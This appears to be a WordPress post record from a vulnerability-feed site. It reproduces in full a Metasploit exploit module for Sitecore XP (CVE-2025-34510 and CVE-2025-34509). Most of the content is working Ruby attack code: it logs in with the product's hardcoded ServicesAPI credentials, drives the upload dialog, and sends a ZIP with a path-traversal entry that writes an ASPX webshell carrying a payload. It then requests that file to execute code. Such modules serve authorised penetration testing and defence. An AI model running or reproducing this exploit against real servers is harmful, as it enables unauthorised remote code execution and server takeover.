{"id":17170,"date":"2025-09-11T14:51:39","date_gmt":"2025-09-11T14:51:39","guid":{"rendered":"http:\/\/localhost\/?p=17170"},"modified":"2025-09-11T14:51:39","modified_gmt":"2025-09-11T14:51:39","slug":"sitecore-xp-cve-2025-34510-post-authentication-remote-code-execution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=17170","title":{"rendered":"Sitecore XP CVE-2025-34510 Post-Authentication Remote Code Execution_MSF:EXPLOIT-WINDOWS-HTTP-SITECORE_XP_CVE_2025_34510-"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-09-11T19:04:31&#8243;,&#8221;description&#8221;:&#8221;This module exploits CVE-2025-34510, path traversal&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-09-11T18:57:23&#8243;,&#8221;modified&#8221;:&#8221;2025-09-11T18:57:23&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Sitecore XP CVE-2025-34510 Post-Authentication Remote Code Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:EXPLOIT-WINDOWS-HTTP-SITECORE_XP_CVE_2025_34510-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-34509&#8243;,&#8221;CVE-2025-34510&#8243;],&#8221;sourceData&#8221;:&#8221;##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nrequire &#8216;rex\/zip&#8217;\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n\\n  Rank = ExcellentRanking\\n  include Msf::Exploit::Remote::HTTP::SitecoreXp\\n  include Msf::Exploit::Remote::HttpClient\\n  include Msf::Exploit::CmdStager\\n  prepend Msf::Exploit::Remote::AutoCheck\\n\\n  def initialize(info = {})\\n    super(\\n      update_info(\\n        info,\\n        &#8216;Name&#8217; =\\u003e &#8216;Sitecore XP CVE-2025-34510 Post-Authentication Remote Code Execution&#8217;,\\n        &#8216;Description&#8217; =\\u003e %q{\\n          This module exploits CVE-2025-34510, path traversal leading to remote code execution. The module exploits also CVE-2025-34509 &#8211; hardcoded credentials of ServicesAPI account &#8211; to gain foothold.\\n        },\\n        &#8216;License&#8217; =\\u003e MSF_LICENSE,\\n        &#8216;Author&#8217; =\\u003e [\\n          &#8216;Piotr Bazydlo&#8217;, # Discovery\\n          &#8216;msutovsky-r7&#8217; # Module Creator\\n        ],\\n        &#8216;References&#8217; =\\u003e [\\n          [&#8216;CVE&#8217;, &#8216;2025-34510&#8217;],\\n          [&#8216;URL&#8217;, &#8216;https:\/\/labs.watchtowr.com\/is-b-for-backdoor-pre-auth-rce-chain-in-sitecore-experience-platform&#8217;],\\n          [&#8216;URL&#8217;, &#8216;https:\/\/support.sitecore.com\/kb?id=kb_article_view\\u0026sysparm_article=KB1003667&#8217;]\\n        ],\\n        &#8216;DisclosureDate&#8217; =\\u003e &#8216;2025-06-17&#8217;,\\n        &#8216;DefaultTarget&#8217; =\\u003e 0,\\n        &#8216;Platform&#8217; =\\u003e &#8216;win&#8217;,\\n        &#8216;Arch&#8217; =\\u003e [ARCH_X86, ARCH_X64],\\n        &#8216;Targets&#8217; =\\u003e [\\n          [\\n            &#8216;Windows&#8217;,\\n            {\\n              &#8216;Arch&#8217; =\\u003e [ARCH_X86, ARCH_X64]\\n            }\\n          ]\\n        ],\\n        &#8216;DefaultOptions&#8217; =\\u003e {\\n          &#8216;RPORT&#8217; =\\u003e 443,\\n          &#8216;SSL&#8217; =\\u003e true\\n        },\\n        &#8216;Notes&#8217; =\\u003e {\\n          &#8216;Stability&#8217; =\\u003e [CRASH_SAFE],\\n          &#8216;Reliability&#8217; =\\u003e [REPEATABLE_SESSION],\\n          &#8216;SideEffects&#8217; =\\u003e [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\\n        }\\n      )\\n    )\\n    register_options([\\n      OptString.new(&#8216;TARGETURI&#8217;, [true, &#8216;Path to the vulnerable endpoint&#8217;, &#8216;\/&#8217;]),\\n    ])\\n  end\\n\\n  def check\\n    return Exploit::CheckCode::Unknown(&#8216;Could not log in, application might not be Sitecore&#8217;) unless login_identitysrv(&#8216;ServicesAPI&#8217;, &#8216;b&#8217;)\\n\\n    @is_logged = true\\n\\n    return Exploit::CheckCode::Safe(&#8216;Could not get elevated cookies&#8217;) unless get_identity_cookies\\n\\n    @is_elevated = true\\n\\n    sitecore_version = get_version\\n\\n    return Exploit::CheckCode::Vulnerable(\\&#8221;Sitecore version detected #{sitecore_version}, which is vulnerable\\&#8221;) if sitecore_version.between?(Rex::Version.new(&#8216;10.0.0&#8217;), Rex::Version.new(&#8216;10.4&#8217;))\\n\\n    Exploit::CheckCode::Safe(\\&#8221;Detected Sitecore version #{sitecore_version}, which is not vulnerable\\&#8221;)\\n  end\\n\\n  def upload_step(data)\\n    res = send_request_cgi({\\n      &#8216;method&#8217; =\\u003e &#8216;POST&#8217;,\\n      &#8216;uri&#8217; =\\u003e normalize_uri(&#8216;sitecore&#8217;, &#8216;shell&#8217;, &#8216;Applications&#8217;, &#8216;Dialogs&#8217;, &#8216;Upload&#8217;, &#8216;Upload2.aspx&#8217;),\\n      &#8216;vars_get&#8217; =\\u003e { &#8216;hdl&#8217; =\\u003e &#8216;sc_ct_trk&#8217; },\\n      &#8216;keep_cookies&#8217; =\\u003e true,\\n      &#8216;vars_post&#8217; =\\u003e data\\n    })\\n    res\\n  end\\n\\n  def upload_zipslip\\n    fake_zip = \\&#8221;#{Rex::Text.rand_text_alphanumeric(10)}.zip\\&#8221;\\n\\n    res = send_request_cgi({\\n      &#8216;method&#8217; =\\u003e &#8216;GET&#8217;,\\n      &#8216;uri&#8217; =\\u003e normalize_uri(&#8216;sitecore&#8217;, &#8216;shell&#8217;, &#8216;Applications&#8217;, &#8216;Dialogs&#8217;, &#8216;Upload&#8217;, &#8216;Upload2.aspx&#8217;),\\n      &#8216;vars_get&#8217; =\\u003e { &#8216;hdl&#8217; =\\u003e &#8216;sc_ct_trk&#8217; },\\n      &#8216;keep_cookies&#8217; =\\u003e true\\n    })\\n\\n    return false unless res\\u0026.code == 200\\n\\n    hidden_inputs = res.get_hidden_inputs\\n    html_body = res.get_html_document\\n\\n    view_state = html_body.at(\\&#8221;input[@name=&#8217;__VIEWSTATE&#8217;]\\&#8221;)\\n\\n    file_el = html_body.xpath(&#8216;\/\/input&#8217;).find { |link| link[&#8216;name&#8217;] =~ \/File([0-9]+)\/ }\\n\\n    return false unless hidden_inputs \\u0026\\u0026 view_state \\u0026\\u0026 file_el\\n\\n    file_param = file_el[&#8216;name&#8217;]\\n\\n    proto = datastore[&#8216;ssl&#8217;] ? &#8216;https&#8217; : &#8216;http&#8217;\\n\\n    res = upload_step({\\n      &#8216;__PARAMETERS&#8217; =\\u003e &#8216;FileChange&#8217;,\\n      &#8216;__EVENTTARGET&#8217; =\\u003e file_param,\\n      &#8216;__EVENTARGUMENT&#8217; =\\u003e &#8221;,\\n      &#8216;__SOURCE&#8217; =\\u003e file_param,\\n      &#8216;__EVENTTYPE&#8217; =\\u003e &#8216;change&#8217;,\\n      &#8216;__CONTEXTMENU&#8217; =\\u003e &#8221;,\\n      &#8216;__MODIFIED&#8217; =\\u003e &#8221;,\\n      &#8216;__ISEVENT&#8217; =\\u003e &#8216;1&#8217;,\\n      &#8216;__SHIFTKEY&#8217; =\\u003e &#8221;,\\n      &#8216;__CTRLKEY&#8217; =\\u003e &#8221;,\\n      &#8216;__ALTKEY&#8217; =\\u003e &#8221;,\\n      &#8216;__BUTTON&#8217; =\\u003e &#8216;undefined&#8217;,\\n      &#8216;__KEYCODE&#8217; =\\u003e &#8216;undefined&#8217;,\\n      &#8216;__X&#8217; =\\u003e &#8216;undefined&#8217;,\\n      &#8216;__Y&#8217; =\\u003e &#8216;undefined&#8217;,\\n      &#8216;__URL&#8217; =\\u003e \\&#8221;#{proto}:\/\/#{datastore[&#8216;vhost&#8217;]}\/sitecore\/shell\/Applications\/Dialogs\/Upload\/Upload2.aspx%3Fhdl%3Dsc_ct_trk\\&#8221;,\\n      &#8216;__CSRFTOKEN&#8217; =\\u003e hidden_inputs.dig(0, &#8216;__CSRFTOKEN&#8217;),\\n      &#8216;__VIEWSTATE&#8217; =\\u003e view_state[&#8216;value&#8217;],\\n      &#8216;Language&#8217; =\\u003e hidden_inputs.dig(0, &#8216;Language&#8217;),\\n      &#8216;Item&#8217; =\\u003e hidden_inputs.dig(0, &#8216;Item&#8217;),\\n      &#8216;Path&#8217; =\\u003e hidden_inputs.dig(0, &#8216;Path&#8217;),\\n      &#8216;Unzip&#8217; =\\u003e &#8216;0&#8217;,\\n      &#8216;Overwrite&#8217; =\\u003e hidden_inputs.dig(0, &#8216;Overwrite&#8217;),\\n      file_param =\\u003e &#8216;C%3A%5Cfakepath%5C&#8217; + fake_zip,\\n      &#8216;ffSubmitForm&#8217; =\\u003e &#8221;\\n    })\\n\\n    return false unless res\\u0026.code == 200\\n\\n    json_data = res.get_json_document\\n\\n    return false unless json_data.dig(&#8216;commands&#8217;, 1, &#8216;value&#8217;) =~ \/name=\\&#8221;File([a-zA-Z0-9]+)\\&#8221;\/\\n\\n    new_file_input = \\&#8221;File#{Regexp.last_match(1)}\\&#8221;\\n\\n    res = upload_step({\\n      &#8216;__PARAMETERS&#8217; =\\u003e &#8221;,\\n      &#8216;__EVENTTARGET&#8217; =\\u003e &#8216;NextButton&#8217;,\\n      &#8216;__EVENTARGUMENT&#8217; =\\u003e &#8221;,\\n      &#8216;__SOURCE&#8217; =\\u003e &#8216;NextButton&#8217;,\\n      &#8216;__EVENTTYPE&#8217; =\\u003e &#8216;click&#8217;,\\n      &#8216;__CONTEXTMENU&#8217; =\\u003e &#8221;,\\n      &#8216;__MODIFIED&#8217; =\\u003e &#8221;,\\n      &#8216;__ISEVENT&#8217; =\\u003e &#8216;1&#8217;,\\n      &#8216;__SHIFTKEY&#8217; =\\u003e &#8221;,\\n      &#8216;__CTRLKEY&#8217; =\\u003e &#8221;,\\n      &#8216;__ALTKEY&#8217; =\\u003e &#8221;,\\n      &#8216;__BUTTON&#8217; =\\u003e &#8216;0&#8217;,\\n      &#8216;__KEYCODE&#8217; =\\u003e &#8216;undefined&#8217;,\\n      &#8216;__X&#8217; =\\u003e &#8216;1525&#8217;,\\n      &#8216;__Y&#8217; =\\u003e &#8216;1258&#8217;,\\n      &#8216;__URL&#8217; =\\u003e \\&#8221;#{proto}:\/\/#{datastore[&#8216;vhost&#8217;]}\/sitecore\/shell\/Applications\/Dialogs\/Upload\/Upload2.aspx%3Fhdl%3Dsc_ct_trk\\&#8221;,\\n      &#8216;__CSRFTOKEN&#8217; =\\u003e hidden_inputs.dig(0, &#8216;__CSRFTOKEN&#8217;),\\n      &#8216;__VIEWSTATE&#8217; =\\u003e view_state[&#8216;value&#8217;],\\n      &#8216;Language&#8217; =\\u003e hidden_inputs.dig(0, &#8216;Language&#8217;),\\n      &#8216;Item&#8217; =\\u003e hidden_inputs.dig(0, &#8216;Item&#8217;),\\n      &#8216;Path&#8217; =\\u003e hidden_inputs.dig(0, &#8216;Path&#8217;),\\n      &#8216;Unzip&#8217; =\\u003e &#8216;0&#8217;,\\n      &#8216;Overwrite&#8217; =\\u003e hidden_inputs.dig(0, &#8216;Overwrite&#8217;),\\n      new_file_input =\\u003e &#8221;,\\n      file_param =\\u003e &#8216;C%3A%5Cfakepath%5C&#8217; + fake_zip,\\n      &#8216;ffSubmitForm&#8217; =\\u003e &#8221;\\n    })\\n\\n    return false unless res\\u0026.code == 200\\n\\n    res = upload_step({\\n      &#8216;__PARAMETERS&#8217; =\\u003e &#8221;,\\n      &#8216;__EVENTTARGET&#8217; =\\u003e &#8216;NextButton&#8217;,\\n      &#8216;__EVENTARGUMENT&#8217; =\\u003e &#8221;,\\n      &#8216;__SOURCE&#8217; =\\u003e &#8216;NextButton&#8217;,\\n      &#8216;__EVENTTYPE&#8217; =\\u003e &#8216;click&#8217;,\\n      &#8216;__CONTEXTMENU&#8217; =\\u003e &#8221;,\\n      &#8216;__MODIFIED&#8217; =\\u003e &#8221;,\\n      &#8216;__ISEVENT&#8217; =\\u003e &#8216;1&#8217;,\\n      &#8216;__SHIFTKEY&#8217; =\\u003e &#8221;,\\n      &#8216;__CTRLKEY&#8217; =\\u003e &#8221;,\\n      &#8216;__ALTKEY&#8217; =\\u003e &#8221;,\\n      &#8216;__BUTTON&#8217; =\\u003e &#8216;0&#8217;,\\n      &#8216;__KEYCODE&#8217; =\\u003e &#8216;undefined&#8217;,\\n      &#8216;__X&#8217; =\\u003e &#8216;1524&#8217;,\\n      &#8216;__Y&#8217; =\\u003e &#8216;1265&#8217;,\\n      &#8216;__URL&#8217; =\\u003e \\&#8221;#{proto}:\/\/#{datastore[&#8216;vhost&#8217;]}\/sitecore\/shell\/Applications\/Dialogs\/Upload\/Upload2.aspx%3Fhdl%3Dsc_ct_trk\\&#8221;,\\n      &#8216;__CSRFTOKEN&#8217; =\\u003e hidden_inputs.dig(0, &#8216;__CSRFTOKEN&#8217;),\\n      &#8216;__VIEWSTATE&#8217; =\\u003e view_state[&#8216;value&#8217;],\\n      &#8216;Language&#8217; =\\u003e hidden_inputs.dig(0, &#8216;Language&#8217;),\\n      &#8216;Item&#8217; =\\u003e hidden_inputs.dig(0, &#8216;Item&#8217;),\\n      &#8216;Path&#8217; =\\u003e hidden_inputs.dig(0, &#8216;Path&#8217;),\\n      &#8216;Unzip&#8217; =\\u003e &#8216;0&#8217;,\\n      &#8216;Overwrite&#8217; =\\u003e hidden_inputs.dig(0, &#8216;Overwrite&#8217;),\\n      new_file_input =\\u003e &#8221;,\\n      file_param =\\u003e &#8216;C%3A%5Cfakepath%5C&#8217; + fake_zip,\\n      &#8216;ffSubmitForm&#8217; =\\u003e &#8221;\\n    })\\n\\n    return false unless res\\u0026.code == 200\\n\\n    res = upload_step({\\n      &#8216;__PARAMETERS&#8217; =\\u003e &#8216;upload:unzipclicked&#8217;,\\n      &#8216;__EVENTTARGET&#8217; =\\u003e &#8216;UnzipCheck&#8217;,\\n      &#8216;__EVENTARGUMENT&#8217; =\\u003e &#8221;,\\n      &#8216;__SOURCE&#8217; =\\u003e &#8216;UnzipCheck&#8217;,\\n      &#8216;__EVENTTYPE&#8217; =\\u003e &#8216;change&#8217;,\\n      &#8216;__CONTEXTMENU&#8217; =\\u003e &#8221;,\\n      &#8216;__MODIFIED&#8217; =\\u003e &#8221;,\\n      &#8216;__ISEVENT&#8217; =\\u003e &#8216;1&#8217;,\\n      &#8216;__SHIFTKEY&#8217; =\\u003e &#8221;,\\n      &#8216;__CTRLKEY&#8217; =\\u003e &#8221;,\\n      &#8216;__ALTKEY&#8217; =\\u003e &#8221;,\\n      &#8216;__BUTTON&#8217; =\\u003e &#8216;undefined&#8217;,\\n      &#8216;__KEYCODE&#8217; =\\u003e &#8216;undefined&#8217;,\\n      &#8216;__X&#8217; =\\u003e &#8216;undefined&#8217;,\\n      &#8216;__Y&#8217; =\\u003e &#8216;undefined&#8217;,\\n      &#8216;__URL&#8217; =\\u003e \\&#8221;#{proto}:\/\/#{datastore[&#8216;vhost&#8217;]}\/sitecore\/shell\/Applications\/Dialogs\/Upload\/Upload2.aspx%3Fhdl%3Dsc_ct_trk\\&#8221;,\\n      &#8216;__CSRFTOKEN&#8217; =\\u003e hidden_inputs.dig(0, &#8216;__CSRFTOKEN&#8217;),\\n      &#8216;__VIEWSTATE&#8217; =\\u003e view_state[&#8216;value&#8217;],\\n      &#8216;Language&#8217; =\\u003e hidden_inputs.dig(0, &#8216;Language&#8217;),\\n      &#8216;Item&#8217; =\\u003e hidden_inputs.dig(0, &#8216;Item&#8217;),\\n      &#8216;Path&#8217; =\\u003e hidden_inputs.dig(0, &#8216;Path&#8217;),\\n      &#8216;Unzip&#8217; =\\u003e &#8216;0&#8217;,\\n      &#8216;Overwrite&#8217; =\\u003e hidden_inputs.dig(0, &#8216;Overwrite&#8217;),\\n      new_file_input =\\u003e &#8221;,\\n      file_param =\\u003e &#8216;C%3A%5Cfakepath%5C&#8217; + fake_zip,\\n      &#8216;UnzipCheck&#8217; =\\u003e &#8216;1&#8217;,\\n      &#8216;ffSubmitForm&#8217; =\\u003e &#8221;\\n    })\\n\\n    return false unless res\\u0026.code == 200\\n\\n    res = upload_step({\\n      &#8216;__PARAMETERS&#8217; =\\u003e &#8221;,\\n      &#8216;__EVENTTARGET&#8217; =\\u003e &#8216;NextButton&#8217;,\\n      &#8216;__EVENTARGUMENT&#8217; =\\u003e &#8221;,\\n      &#8216;__SOURCE&#8217; =\\u003e &#8216;NextButton&#8217;,\\n      &#8216;__EVENTTYPE&#8217; =\\u003e &#8216;click&#8217;,\\n      &#8216;__CONTEXTMENU&#8217; =\\u003e &#8221;,\\n      &#8216;__MODIFIED&#8217; =\\u003e &#8221;,\\n      &#8216;__ISEVENT&#8217; =\\u003e &#8216;1&#8217;,\\n      &#8216;__SHIFTKEY&#8217; =\\u003e &#8221;,\\n      &#8216;__CTRLKEY&#8217; =\\u003e &#8221;,\\n      &#8216;__ALTKEY&#8217; =\\u003e &#8221;,\\n      &#8216;__BUTTON&#8217; =\\u003e &#8216;0&#8217;,\\n      &#8216;__KEYCODE&#8217; =\\u003e &#8216;undefined&#8217;,\\n      &#8216;__X&#8217; =\\u003e &#8216;1523&#8217;,\\n      &#8216;__Y&#8217; =\\u003e &#8216;1257&#8217;,\\n      &#8216;__URL&#8217; =\\u003e \\&#8221;#{proto}:\/\/#{datastore[&#8216;vhost&#8217;]}\/sitecore\/shell\/Applications\/Dialogs\/Upload\/Upload2.aspx%3Fhdl%3Dsc_ct_trk\\&#8221;,\\n      &#8216;__CSRFTOKEN&#8217; =\\u003e hidden_inputs.dig(0, &#8216;__CSRFTOKEN&#8217;),\\n      &#8216;__VIEWSTATE&#8217; =\\u003e view_state[&#8216;value&#8217;],\\n      &#8216;Language&#8217; =\\u003e hidden_inputs.dig(0, &#8216;Language&#8217;),\\n      &#8216;Item&#8217; =\\u003e hidden_inputs.dig(0, &#8216;Item&#8217;),\\n      &#8216;Path&#8217; =\\u003e hidden_inputs.dig(0, &#8216;Path&#8217;),\\n      &#8216;Unzip&#8217; =\\u003e &#8216;0&#8217;,\\n      &#8216;Overwrite&#8217; =\\u003e hidden_inputs.dig(0, &#8216;Overwrite&#8217;),\\n      new_file_input =\\u003e &#8221;,\\n      file_param =\\u003e &#8216;C%3A%5Cfakepath%5C&#8217; + fake_zip,\\n      &#8216;UnzipCheck&#8217; =\\u003e &#8216;1&#8217;,\\n      &#8216;ffSubmitForm&#8217; =\\u003e &#8221;\\n    })\\n\\n    return false unless res\\u0026.code == 200\\n\\n    res = upload_step({\\n      &#8216;__PARAMETERS&#8217; =\\u003e &#8216;StartUploading&#8217;,\\n      &#8216;__EVENTTARGET&#8217; =\\u003e &#8221;,\\n      &#8216;__EVENTARGUMENT&#8217; =\\u003e &#8221;,\\n      &#8216;__SOURCE&#8217; =\\u003e &#8221;,\\n      &#8216;__EVENTTYPE&#8217; =\\u003e &#8221;,\\n      &#8216;__CONTEXTMENU&#8217; =\\u003e &#8221;,\\n      &#8216;__MODIFIED&#8217; =\\u003e &#8221;,\\n      &#8216;__ISEVENT&#8217; =\\u003e &#8216;1&#8217;,\\n      &#8216;__CSRFTOKEN&#8217; =\\u003e hidden_inputs.dig(0, &#8216;__CSRFTOKEN&#8217;),\\n      &#8216;__VIEWSTATE&#8217; =\\u003e view_state[&#8216;value&#8217;],\\n      &#8216;Language&#8217; =\\u003e hidden_inputs.dig(0, &#8216;Language&#8217;),\\n      &#8216;Item&#8217; =\\u003e hidden_inputs.dig(0, &#8216;Item&#8217;),\\n      &#8216;Path&#8217; =\\u003e hidden_inputs.dig(0, &#8216;Path&#8217;),\\n      &#8216;Unzip&#8217; =\\u003e &#8216;1&#8217;,\\n      &#8216;Overwrite&#8217; =\\u003e hidden_inputs.dig(0, &#8216;Overwrite&#8217;),\\n      new_file_input =\\u003e &#8221;,\\n      file_param =\\u003e &#8216;C%3A%5Cfakepath%5C&#8217; + fake_zip,\\n      &#8216;UnzipCheck&#8217; =\\u003e &#8216;1&#8217;,\\n      &#8216;ffSubmitForm&#8217; =\\u003e &#8221;\\n    })\\n\\n    return false unless res\\u0026.code == 200\\n\\n    zip = Rex::Zip::Archive.new\\n\\n    @webshell_file = \\&#8221;#{Rex::Text.rand_text_alpha(15)}.aspx\\&#8221;\\n    exe = generate_payload_exe\\n    asp = Msf::Util::EXE.to_exe_aspx(exe)\\n\\n    zip.add_file(&#8216;\/\/\\\\\/..\/&#8217; + @webshell_file, asp)\\n\\n    zip_data = zip.pack\\n\\n    vars_form_data = [\\n      { &#8216;name&#8217; =\\u003e &#8216;__CSRFTOKEN&#8217;, &#8216;data&#8217; =\\u003e hidden_inputs.dig(0, &#8216;__CSRFTOKEN&#8217;) },\\n      { &#8216;name&#8217; =\\u003e &#8216;__VIEWSTATE&#8217;, &#8216;data&#8217; =\\u003e view_state[&#8216;value&#8217;] },\\n      { &#8216;name&#8217; =\\u003e &#8216;Item&#8217;, &#8216;data&#8217; =\\u003e hidden_inputs.dig(0, &#8216;Item&#8217;) },\\n      { &#8216;name&#8217; =\\u003e &#8216;Language&#8217;, &#8216;data&#8217; =\\u003e hidden_inputs.dig(0, &#8216;Language&#8217;) },\\n      { &#8216;name&#8217; =\\u003e &#8216;Path&#8217;, &#8216;data&#8217; =\\u003e hidden_inputs.dig(0, &#8216;Path&#8217;) },\\n      { &#8216;name&#8217; =\\u003e &#8216;Unzip&#8217;, &#8216;data&#8217; =\\u003e &#8216;1&#8217; },\\n      { &#8216;name&#8217; =\\u003e &#8216;Overwrite&#8217;, &#8216;data&#8217; =\\u003e hidden_inputs.dig(0, &#8216;Overwrite&#8217;) },\\n      { &#8216;name&#8217; =\\u003e file_param, &#8216;data&#8217; =\\u003e zip_data, &#8216;content_type&#8217; =\\u003e &#8216;application\/zip&#8217;, &#8216;encoding&#8217; =\\u003e &#8216;binary&#8217;, &#8216;filename&#8217; =\\u003e fake_zip },\\n      { &#8216;name&#8217; =\\u003e new_file_input, &#8216;data&#8217; =\\u003e &#8221;, &#8216;content_type&#8217; =\\u003e &#8216;application\/octet-stream&#8217;, &#8216;filename&#8217; =\\u003e &#8221; }\\n    ]\\n    res = send_request_cgi({\\n      &#8216;method&#8217; =\\u003e &#8216;POST&#8217;,\\n      &#8216;uri&#8217; =\\u003e normalize_uri(&#8216;sitecore&#8217;, &#8216;shell&#8217;, &#8216;Applications&#8217;, &#8216;Dialogs&#8217;, &#8216;Upload&#8217;, &#8216;Upload2.aspx&#8217;),\\n      &#8216;vars_get&#8217; =\\u003e { &#8216;hdl&#8217; =\\u003e &#8216;sc_ct_trk&#8217; },\\n      &#8216;vars_form_data&#8217; =\\u003e vars_form_data\\n    })\\n\\n    return false unless res\\u0026.code == 200 \\u0026\\u0026 res.body.include?(&#8216;Done&#8217;)\\n\\n    true\\n  end\\n\\n  def trigger_payload\\n    send_request_cgi({\\n      &#8216;method&#8217; =\\u003e &#8216;GET&#8217;,\\n      &#8216;uri&#8217; =\\u003e normalize_uri(@webshell_file)\\n    })\\n  end\\n\\n  def exploit\\n    if !@is_logged \\u0026\\u0026 !login_identitysrv(&#8216;ServicesAPI&#8217;, &#8216;b&#8217;)\\n      fail_with(Failure::NoAccess, &#8216;Failed to log in, check the credentials&#8217;)\\n    end\\n\\n    if !@is_elevated \\u0026\\u0026 !get_identity_cookies\\n      fail_with(Failure::Unknown, &#8216;Failed to get elevated cookies&#8217;)\\n    end\\n\\n    fail_with(Failure::PayloadFailed, &#8216;Failed to upload malicious ZIP&#8217;) unless upload_zipslip\\n\\n    trigger_payload\\n  end\\nend\\n&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/windows\/http\/sitecore_xp_cve_2025_34510.rb&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:8.8,&#8221;severity&#8221;:&#8221;HIGH&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.rapid7.com\/db\/modules\/exploit\/windows\/http\/sitecore_xp_cve_2025_34510\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-09-11T19:04:31&#8243;,&#8221;description&#8221;:&#8221;This module exploits CVE-2025-34510, path traversal&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-09-11T18:57:23&#8243;,&#8221;modified&#8221;:&#8221;2025-09-11T18:57:23&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Sitecore XP CVE-2025-34510 Post-Authentication Remote Code Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:EXPLOIT-WINDOWS-HTTP-SITECORE_XP_CVE_2025_34510-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-34509&#8243;,&#8221;CVE-2025-34510&#8243;],&#8221;sourceData&#8221;:&#8221;##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nrequire &#8216;rex\/zip&#8217;\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n\\n Rank&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,41,12,15,169,13,7,11,5],"class_list":["post-17170","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-88","tag-exploit","tag-high","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Sitecore XP CVE-2025-34510 Post-Authentication Remote Code Execution_MSF:EXPLOIT-WINDOWS-HTTP-SITECORE_XP_CVE_2025_34510- zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=17170\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Sitecore XP CVE-2025-34510 Post-Authentication Remote Code Execution_MSF:EXPLOIT-WINDOWS-HTTP-SITECORE_XP_CVE_2025_34510- zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-09-11T19:04:31&#8243;,&#8221;description&#8221;:&#8221;This module exploits CVE-2025-34510, path traversal&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-09-11T18:57:23&#8243;,&#8221;modified&#8221;:&#8221;2025-09-11T18:57:23&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Sitecore XP CVE-2025-34510 Post-Authentication Remote Code 